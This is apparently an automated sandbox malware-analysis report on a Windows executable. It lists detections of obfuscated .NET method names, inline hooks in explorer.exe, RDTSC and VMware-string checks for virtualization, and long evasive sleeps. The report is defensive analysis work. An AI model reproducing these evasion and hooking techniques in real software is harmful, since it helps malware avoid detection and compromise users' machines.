          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, nRPRNWBauvUXMaKqsE.csHigh entropy of concatenated method names: 'Vlpc6TD2SK', 'Th0cSjJZmn', 'y0Cc7DPYva', 'dg3cAEfdVT', 'fexcaQfrNR', 'QsOcdvbI2v', 'ia0cEM8y1O', 'w002yFsrty', 'JJr2bn3113', 'gDw2pbrqxA'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, srHQXlz7jnNiCOT24M.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhWc8hQNPc', 'ig0c40IXah', 'f40cWtj7Th', 'DcBcMvmsBF', 'zV5c2Fj5qC', 'EH7ccvjiF6', 'Q1dcuCOGVd'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, JneaKoxYOwZYUwgJbY.csHigh entropy of concatenated method names: 'u4OMbjVaor', 'J1pMBXKvNU', 'j4G29mnpAh', 'lCc26jRUKW', 'UDmMNmq1Ti', 'yBUMI0wMqk', 'rqKM5C3Jp5', 'xuCMHa4avC', 'QSYMsFhA2y', 'Gt0MVKc5Am'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, snN1xF7S4RmgbgcW05.csHigh entropy of concatenated method names: 'nWr6Z2wBRM', 'hm66Dagx0E', 'L6f6Fwjdsx', 'kxY61BmBjN', 'z0L64AeV6l', 'SZN6WDd6KI', 'O2mWrrgYu6uEEdvrJG', 'm1nwloGSeqL0RUba8m', 'o9F66HOKkA', 'gaS6S8YfhW'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, myKyekVHN8n3nqSuWK.csHigh entropy of concatenated method names: 'ToString', 'jnbWNlMop9', 'NVoWPQiL3N', 'N9SWmNAaui', 'Lm9WolqIEh', 'M5qWJnIfEl', 'XT9WrXkObY', 'c8fWl26Awg', 'oVCWfvJ85h', 'C1lWQRg35f'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, S6lVZNGDd6KIuoI9tW.csHigh entropy of concatenated method names: 'PEqEL3Et1n', 'MlEEakkbt7', 'QlXEdqg1hx', 'fvcEZ4d43E', 'KdCEDAPSir', 'aPOdhjP0mJ', 'bqCdxtybLI', 'ItqdyxqhDm', 'CrDdb50sdp', 'QGydpNse3d'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, JPpxSbptHsfMShtm7I.csHigh entropy of concatenated method names: 'F8Y2Gvd2B6', 'zQe2P7QBJB', 'cVd2mrx8Hp', 'zb82okjWP3', 'b5W2HaWllR', 'qvO2J2VKtj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, DOTAclT6fwjdsxDxYB.csHigh entropy of concatenated method names: 'CfQgRK1rGf', 'vWhgwcY9hS', 'oK0gjFTEhr', 'YkQgTKboc5', 'eljg4OsR1Q', 'myUgWQCOMe', 'T5dgMiVORV', 'rmSg2owPZr', 'cY0gcQ7Q0I', 'kmFgu9plgm'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, lVaG3Sl3dvGlBTGm5Q.csHigh entropy of concatenated method names: 'BOCZAAZ3dO', 'jwtZgmwfua', 'c0OZEyUPBF', 'vjsEByUp24', 'F2aEzbtmHO', 'WpKZ9qUaql', 'KRAZ6H1980', 'gCoZq8VGbJ', 'LI0ZSbK9yb', 'eTtZ74NG2o'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, OR1PhfbJmeXRkgxLeU.csHigh entropy of concatenated method names: 'w472A0jqI5', 'vAZ2aZP5Lh', 'n7q2gi284x', 'bq92dE01kg', 'o6V2Eqgrwe', 'QgV2ZdlacF', 'ur52DuwRUJ', 'ioV2C8mAhn', 'zNE2FmYnC8', 'zFp21TxKbr'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, yoyd7cHYYLaJbiic6L.csHigh entropy of concatenated method names: 'lWp4OCeOLx', 'SJx4IEbsll', 'wGM4HK9BD8', 'JY04syioUd', 'tRv4PKkQYh', 'brY4m541h6', 'Xu14oH6rke', 'jCt4JbsQuT', 'xHn4rX75cx', 'tZM4l5aclk'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, FAwW796SXsNRBegtEvs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvIuHktqQG', 'ubKus5gh1t', 'XhOuVyLHlT', 'WCXu0RYC6Q', 'iyBuh5vNXb', 'TgwuxFlqpW', 'lK7uyuugO4'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, Q6n3y0QYd7oU3LmetC.csHigh entropy of concatenated method names: 'dUSZtlo0Uy', 'VQBZeULg2j', 'nGnZYG4M51', 'dNjZRmmIh7', 'I8AZixR4Fk', 'S5hZw5Tynv', 'pMuZUOwEbj', 'GjxZj5sjdT', 'c41ZTDYIrt', 'txgZkW5NB9'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.csHigh entropy of concatenated method names: 'E3NSLUBZZq', 'bYTSAM5Fsi', 'xfDSaD9UWq', 'i00SgchJBh', 'DgCSdkvHyh', 'POUSENtJfV', 'tgeSZXvraH', 'orSSDx04dF', 'gtaSCxdGlL', 'kAZSFskPts'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, aeih4850tCygqgvN25.csHigh entropy of concatenated method names: 'GH38jjxGsP', 'Iuy8TbhtZp', 'Aph8Ge7fDh', 'Q2q8PUGGFa', 'JwY8o7r2uc', 'jsh8J9fTUZ', 'ogW8lNtVw9', 'u4A8fSjkdL', 'FDQ8OhR4Y1', 'BuI8NKKi6y'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, G7ZMqUarOIYkDdbkRW.csHigh entropy of concatenated method names: 'Dispose', 'yRp6pjWoZu', 'cTFqP2B6sh', 'gHSttBZ1hj', 'gNR6B1PhfJ', 'IeX6zRkgxL', 'ProcessDialogKey', 'yUJq9PpxSb', 'xHsq6fMSht', 'H7Iqq8RPRN'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, Iu4ZYc69hOfmwAxsFlO.csHigh entropy of concatenated method names: 'oowctZ0Zme', 'kYMceA13dG', 'iUqcYp9iPH', 'MJUcRt2LGR', 'h9ycief1Hi', 'DOIcwi0Jmb', 'PYZcUaPcT7', 'lBEcjp1ulk', 'vyfcToylkN', 'HelckP2fG2'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qFJdNBqjj4uODIWIhK.csHigh entropy of concatenated method names: 'ypwYXU9hB', 'tltRemsu9', 'A31wk6CLq', 'A9HUrDerc', 'yLST0DSKo', 'qVLk70ob7', 'hmwAOixhJRWvidKuMd', 'bE4AGxFKj6rgvMfIYZ', 'ekl2usjMu', 'SAsupHHAj'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, K2wBRMjdm6agx0EcTv.csHigh entropy of concatenated method names: 'y2WaHFmxsT', 'kHnasieWZq', 'OaUaVY4RYL', 'H5ga0t6T4K', 'VJ3ahU8tXc', 'eDRaxQTXli', 'tuDayjuYJf', 'UScabNrYPg', 'jLtapQJobC', 'GrBaBGssEF'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, nRPRNWBauvUXMaKqsE.csHigh entropy of concatenated method names: 'Vlpc6TD2SK', 'Th0cSjJZmn', 'y0Cc7DPYva', 'dg3cAEfdVT', 'fexcaQfrNR', 'QsOcdvbI2v', 'ia0cEM8y1O', 'w002yFsrty', 'JJr2bn3113', 'gDw2pbrqxA'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, srHQXlz7jnNiCOT24M.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhWc8hQNPc', 'ig0c40IXah', 'f40cWtj7Th', 'DcBcMvmsBF', 'zV5c2Fj5qC', 'EH7ccvjiF6', 'Q1dcuCOGVd'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, JneaKoxYOwZYUwgJbY.csHigh entropy of concatenated method names: 'u4OMbjVaor', 'J1pMBXKvNU', 'j4G29mnpAh', 'lCc26jRUKW', 'UDmMNmq1Ti', 'yBUMI0wMqk', 'rqKM5C3Jp5', 'xuCMHa4avC', 'QSYMsFhA2y', 'Gt0MVKc5Am'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, snN1xF7S4RmgbgcW05.csHigh entropy of concatenated method names: 'nWr6Z2wBRM', 'hm66Dagx0E', 'L6f6Fwjdsx', 'kxY61BmBjN', 'z0L64AeV6l', 'SZN6WDd6KI', 'O2mWrrgYu6uEEdvrJG', 'm1nwloGSeqL0RUba8m', 'o9F66HOKkA', 'gaS6S8YfhW'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, myKyekVHN8n3nqSuWK.csHigh entropy of concatenated method names: 'ToString', 'jnbWNlMop9', 'NVoWPQiL3N', 'N9SWmNAaui', 'Lm9WolqIEh', 'M5qWJnIfEl', 'XT9WrXkObY', 'c8fWl26Awg', 'oVCWfvJ85h', 'C1lWQRg35f'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, S6lVZNGDd6KIuoI9tW.csHigh entropy of concatenated method names: 'PEqEL3Et1n', 'MlEEakkbt7', 'QlXEdqg1hx', 'fvcEZ4d43E', 'KdCEDAPSir', 'aPOdhjP0mJ', 'bqCdxtybLI', 'ItqdyxqhDm', 'CrDdb50sdp', 'QGydpNse3d'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, JPpxSbptHsfMShtm7I.csHigh entropy of concatenated method names: 'F8Y2Gvd2B6', 'zQe2P7QBJB', 'cVd2mrx8Hp', 'zb82okjWP3', 'b5W2HaWllR', 'qvO2J2VKtj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, DOTAclT6fwjdsxDxYB.csHigh entropy of concatenated method names: 'CfQgRK1rGf', 'vWhgwcY9hS', 'oK0gjFTEhr', 'YkQgTKboc5', 'eljg4OsR1Q', 'myUgWQCOMe', 'T5dgMiVORV', 'rmSg2owPZr', 'cY0gcQ7Q0I', 'kmFgu9plgm'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, lVaG3Sl3dvGlBTGm5Q.csHigh entropy of concatenated method names: 'BOCZAAZ3dO', 'jwtZgmwfua', 'c0OZEyUPBF', 'vjsEByUp24', 'F2aEzbtmHO', 'WpKZ9qUaql', 'KRAZ6H1980', 'gCoZq8VGbJ', 'LI0ZSbK9yb', 'eTtZ74NG2o'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, OR1PhfbJmeXRkgxLeU.csHigh entropy of concatenated method names: 'w472A0jqI5', 'vAZ2aZP5Lh', 'n7q2gi284x', 'bq92dE01kg', 'o6V2Eqgrwe', 'QgV2ZdlacF', 'ur52DuwRUJ', 'ioV2C8mAhn', 'zNE2FmYnC8', 'zFp21TxKbr'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, yoyd7cHYYLaJbiic6L.csHigh entropy of concatenated method names: 'lWp4OCeOLx', 'SJx4IEbsll', 'wGM4HK9BD8', 'JY04syioUd', 'tRv4PKkQYh', 'brY4m541h6', 'Xu14oH6rke', 'jCt4JbsQuT', 'xHn4rX75cx', 'tZM4l5aclk'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, FAwW796SXsNRBegtEvs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvIuHktqQG', 'ubKus5gh1t', 'XhOuVyLHlT', 'WCXu0RYC6Q', 'iyBuh5vNXb', 'TgwuxFlqpW', 'lK7uyuugO4'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, Q6n3y0QYd7oU3LmetC.csHigh entropy of concatenated method names: 'dUSZtlo0Uy', 'VQBZeULg2j', 'nGnZYG4M51', 'dNjZRmmIh7', 'I8AZixR4Fk', 'S5hZw5Tynv', 'pMuZUOwEbj', 'GjxZj5sjdT', 'c41ZTDYIrt', 'txgZkW5NB9'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.csHigh entropy of concatenated method names: 'E3NSLUBZZq', 'bYTSAM5Fsi', 'xfDSaD9UWq', 'i00SgchJBh', 'DgCSdkvHyh', 'POUSENtJfV', 'tgeSZXvraH', 'orSSDx04dF', 'gtaSCxdGlL', 'kAZSFskPts'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, aeih4850tCygqgvN25.csHigh entropy of concatenated method names: 'GH38jjxGsP', 'Iuy8TbhtZp', 'Aph8Ge7fDh', 'Q2q8PUGGFa', 'JwY8o7r2uc', 'jsh8J9fTUZ', 'ogW8lNtVw9', 'u4A8fSjkdL', 'FDQ8OhR4Y1', 'BuI8NKKi6y'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, G7ZMqUarOIYkDdbkRW.csHigh entropy of concatenated method names: 'Dispose', 'yRp6pjWoZu', 'cTFqP2B6sh', 'gHSttBZ1hj', 'gNR6B1PhfJ', 'IeX6zRkgxL', 'ProcessDialogKey', 'yUJq9PpxSb', 'xHsq6fMSht', 'H7Iqq8RPRN'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, Iu4ZYc69hOfmwAxsFlO.csHigh entropy of concatenated method names: 'oowctZ0Zme', 'kYMceA13dG', 'iUqcYp9iPH', 'MJUcRt2LGR', 'h9ycief1Hi', 'DOIcwi0Jmb', 'PYZcUaPcT7', 'lBEcjp1ulk', 'vyfcToylkN', 'HelckP2fG2'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qFJdNBqjj4uODIWIhK.csHigh entropy of concatenated method names: 'ypwYXU9hB', 'tltRemsu9', 'A31wk6CLq', 'A9HUrDerc', 'yLST0DSKo', 'qVLk70ob7', 'hmwAOixhJRWvidKuMd', 'bE4AGxFKj6rgvMfIYZ', 'ekl2usjMu', 'SAsupHHAj'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, K2wBRMjdm6agx0EcTv.csHigh entropy of concatenated method names: 'y2WaHFmxsT', 'kHnasieWZq', 'OaUaVY4RYL', 'H5ga0t6T4K', 'VJ3ahU8tXc', 'eDRaxQTXli', 'tuDayjuYJf', 'UScabNrYPg', 'jLtapQJobC', 'GrBaBGssEF'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, nRPRNWBauvUXMaKqsE.csHigh entropy of concatenated method names: 'Vlpc6TD2SK', 'Th0cSjJZmn', 'y0Cc7DPYva', 'dg3cAEfdVT', 'fexcaQfrNR', 'QsOcdvbI2v', 'ia0cEM8y1O', 'w002yFsrty', 'JJr2bn3113', 'gDw2pbrqxA'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: 2FcJgghyXg.exe PID: 7656, type: MEMORYSTR
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002CA9904 second address: 0000000002CA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002CA9B6E second address: 0000000002CA9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-13965
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe TID: 7660Thread sleep time: -37529s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe TID: 7676Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeAPI coverage: 7.5 %
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeThread delayed: delay time: 37529Jump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 27 43 bd 4f fb d6 f7-05 68 d7 e7 4d 4c b1 65
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ware, Inc.NoneVMware-42 27 43 bd 4f fb d6 f7-05 68 d7 e7 4d 4c b1 65VMware7
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.2499028894.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000z
          Source: explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000Y
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009360000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.0000000009360000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareCloudData.Scope
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7
          Source: explorer.exe, 00000003.00000002.2499028894.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
          Source: explorer.exe, 00000003.00000002.2509722390.00000000095C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&11bd2db8&0&000000*rN(
          Source: explorer.exe, 00000003.00000002.2502312360.0000000004C2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&11bd2db8&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BA83000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&11BD2DB8&0&000000
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0187519B mov eax, dword ptr fs:[00000030h]2_2_0187519B
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017C514F mov eax, dword ptr fs:[00000030h]2_2_017C514F
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018491B0 mov eax, dword ptr fs:[00000030h]2_2_018491B0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017A514D mov eax, dword ptr fs:[00000030h]2_2_017A514D
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_017E0145 mov eax, dword ptr fs:[00000030h]2_2_017E0145
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179A147 mov eax, dword ptr fs:[00000030h]2_2_0179A147
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179A147 mov eax, dword ptr fs:[00000030h]2_2_0179A147
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_0179A147 mov eax, dword ptr fs:[00000030h]2_2_0179A147
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exeCode function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h]2_2_018741C0
